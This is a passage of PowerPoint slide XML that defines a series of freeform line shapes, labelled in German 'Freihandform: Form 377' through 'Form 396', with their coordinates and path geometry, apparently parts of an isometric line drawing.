                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4990A475-1FA5-4661-9433-96C38218DA76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915400" y="-224622"/>
              <a:ext cx="472950" cy="272868"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191949 w 191947"/>
                <a:gd name="connsiteY0" fmla="*/ 107616 h 110744"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191947"/>
                <a:gd name="connsiteY1" fmla="*/ -3128 h 110744"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191947" h="110744">
                  <a:moveTo>
                    <a:pt x="191949" y="107616"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-312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78" name="Freihandform: Form 377">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07136ACF-A65F-4205-9194-58D794817614}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915307" y="-224622"/>
              <a:ext cx="94" cy="272868"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 38"/>
                <a:gd name="connsiteY0" fmla="*/ 107616 h 110744"/>
                <a:gd name="connsiteX1" fmla="*/ 39 w 38"/>
                <a:gd name="connsiteY1" fmla="*/ -3128 h 110744"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="38" h="110744">
                  <a:moveTo>
                    <a:pt x="1" y="107616"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39" y="-312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79" name="Freihandform: Form 378">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9D0E1C-AD4D-4FCB-9730-1EF3829CDD1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334373" y="-224622"/>
              <a:ext cx="472787" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 191881"/>
                <a:gd name="connsiteY0" fmla="*/ 107807 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 191882 w 191881"/>
                <a:gd name="connsiteY1" fmla="*/ -3128 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191881" h="110935">
                  <a:moveTo>
                    <a:pt x="1" y="107807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191882" y="-312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80" name="Freihandform: Form 379">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C0C0C71-9FCC-48BE-B207-301969B2C616}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624829" y="-87954"/>
              <a:ext cx="709379" cy="409783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287902"/>
                <a:gd name="connsiteY0" fmla="*/ 163200 h 166311"/>
                <a:gd name="connsiteX1" fmla="*/ 287904 w 287902"/>
                <a:gd name="connsiteY1" fmla="*/ -3111 h 166311"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287902" h="166311">
                  <a:moveTo>
                    <a:pt x="1" y="163200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287904" y="-3111"/>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81" name="Freihandform: Form 380">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC86E74-2480-467D-AD41-E70231151FEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624829" y="185390"/>
              <a:ext cx="709544" cy="409776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ 163221 h 166308"/>
                <a:gd name="connsiteX1" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ -3088 h 166308"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="166308">
                  <a:moveTo>
                    <a:pt x="1" y="163221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287970" y="-308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82" name="Freihandform: Form 381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB91F965-D44E-44E7-B008-3B6A441BB366}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861327" y="868044"/>
              <a:ext cx="472341" cy="273810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191701 w 191700"/>
                <a:gd name="connsiteY0" fmla="*/ 108091 h 111126"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191700"/>
                <a:gd name="connsiteY1" fmla="*/ -3035 h 111126"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191700" h="111126">
                  <a:moveTo>
                    <a:pt x="191701" y="108091"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3035"/>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83" name="Freihandform: Form 382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8054353-AE88-473B-9798-97B2E2022FAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624641" y="594934"/>
              <a:ext cx="237203" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96269"/>
                <a:gd name="connsiteY0" fmla="*/ -3064 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 96270 w 96269"/>
                <a:gd name="connsiteY1" fmla="*/ 52309 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96269" h="55373">
                  <a:moveTo>
                    <a:pt x="1" y="-3064"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96270" y="52309"/>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84" name="Freihandform: Form 383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE530294-E5A3-40A5-9B0D-90902F1AB949}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861305" y="731841"/>
              <a:ext cx="236520" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ -3053 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52414 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="-3053"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="5241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85" name="Freihandform: Form 384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B189980B-290C-4122-B340-AF35DA1C148B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334351" y="-224386"/>
              <a:ext cx="23469" cy="1092666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -3093 h 443460"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ 440367 h 443460"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="443460">
                  <a:moveTo>
                    <a:pt x="1" y="-3093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="440367"/>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86" name="Freihandform: Form 385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F613D7-BFC9-442A-9583-DBCAA1FE3406}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10333668" y="868044"/>
              <a:ext cx="237437" cy="136432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96365 w 96364"/>
                <a:gd name="connsiteY0" fmla="*/ -3041 h 55371"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96364"/>
                <a:gd name="connsiteY1" fmla="*/ 52330 h 55371"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96364" h="55371">
                  <a:moveTo>
                    <a:pt x="96365" y="-3041"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5233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87" name="Freihandform: Form 386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C531BA9D-806F-41B4-B916-4058C6430B55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10098673" y="1004475"/>
              <a:ext cx="472435" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 191738"/>
                <a:gd name="connsiteY0" fmla="*/ -3024 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 191739 w 191738"/>
                <a:gd name="connsiteY1" fmla="*/ 107914 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191738" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="-3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191739" y="10791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88" name="Freihandform: Form 387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD45499-8E76-45BF-879F-9DC23C6AFE37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8205762" y="185390"/>
              <a:ext cx="946020" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 383943"/>
                <a:gd name="connsiteY0" fmla="*/ 218696 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 383944 w 383943"/>
                <a:gd name="connsiteY1" fmla="*/ -3082 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="383943" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218696"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="383944" y="-3082"/>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89" name="Freihandform: Form 388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9614BDC8-BCE6-4403-ACA8-DEF045193743}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442261" y="48719"/>
              <a:ext cx="946114" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 383981"/>
                <a:gd name="connsiteY0" fmla="*/ 218684 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 383982 w 383981"/>
                <a:gd name="connsiteY1" fmla="*/ -3093 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="383981" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218684"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="383982" y="-3093"/>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90" name="Freihandform: Form 389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAF7A6A-0422-4274-B3F6-477A7D76F36C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624641" y="731370"/>
              <a:ext cx="163" cy="546685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 66"/>
                <a:gd name="connsiteY0" fmla="*/ 218838 h 221873"/>
                <a:gd name="connsiteX1" fmla="*/ 68 w 66"/>
                <a:gd name="connsiteY1" fmla="*/ -3035 h 221873"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66" h="221873">
                  <a:moveTo>
                    <a:pt x="1" y="218838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="68" y="-3035"/>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91" name="Freihandform: Form 390">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A556EB2-F37D-44BC-A9A2-4FFDC78B3EE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861305" y="868509"/>
              <a:ext cx="23469" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107903 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3035 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3035"/>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92" name="Freihandform: Form 391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E3D0D5-5919-4183-9247-5868E54126FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624804" y="1278526"/>
              <a:ext cx="709544" cy="409776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ -2994 h 166308"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ 163314 h 166308"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="166308">
                  <a:moveTo>
                    <a:pt x="287970" y="-2994"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="16331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93" name="Freihandform: Form 392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B015AC-0AC5-4C86-81E4-2DCC68ED3410}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861305" y="1141853"/>
              <a:ext cx="709544" cy="1230741"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ -2971 h 499498"/>
                <a:gd name="connsiteX1" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ 329742 h 499498"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY2" fmla="*/ 496528 h 499498"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="499498">
                  <a:moveTo>
                    <a:pt x="287970" y="-2971"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="287970" y="329742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="49652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94" name="Freihandform: Form 393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AA4D04-0D08-46E1-91B0-D4531F8D1CDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861844" y="594934"/>
              <a:ext cx="235981" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95773"/>
                <a:gd name="connsiteY0" fmla="*/ 52500 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 95775 w 95773"/>
                <a:gd name="connsiteY1" fmla="*/ -3064 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95773" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="52500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95775" y="-3064"/>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95" name="Freihandform: Form 394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6846B632-8CE1-4214-905D-44E8523E4D6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9624641" y="731370"/>
              <a:ext cx="236686" cy="137136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96059"/>
                <a:gd name="connsiteY0" fmla="*/ 52605 h 55657"/>
                <a:gd name="connsiteX1" fmla="*/ 96061 w 96059"/>
                <a:gd name="connsiteY1" fmla="*/ -3053 h 55657"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96059" h="55657">
                  <a:moveTo>
                    <a:pt x="1" y="52605"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96061" y="-3053"/>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96" name="Freihandform: Form 395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB44693-3E40-40C8-B15B-11AB02581DC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861352" y="321829"/>
              <a:ext cx="23469" cy="273102"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107758 h 110839"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3082 h 110839"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110839">
                  <a:moveTo>
                    <a:pt x="1" y="107758"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3082"/>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97" name="Freihandform: Form 396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D62863-2CB4-48C3-882D-60B58A296DB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861352" y="-224622"/>
              <a:ext cx="23469" cy="273810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107998 h 111126"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3128 h 111126"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="111126">
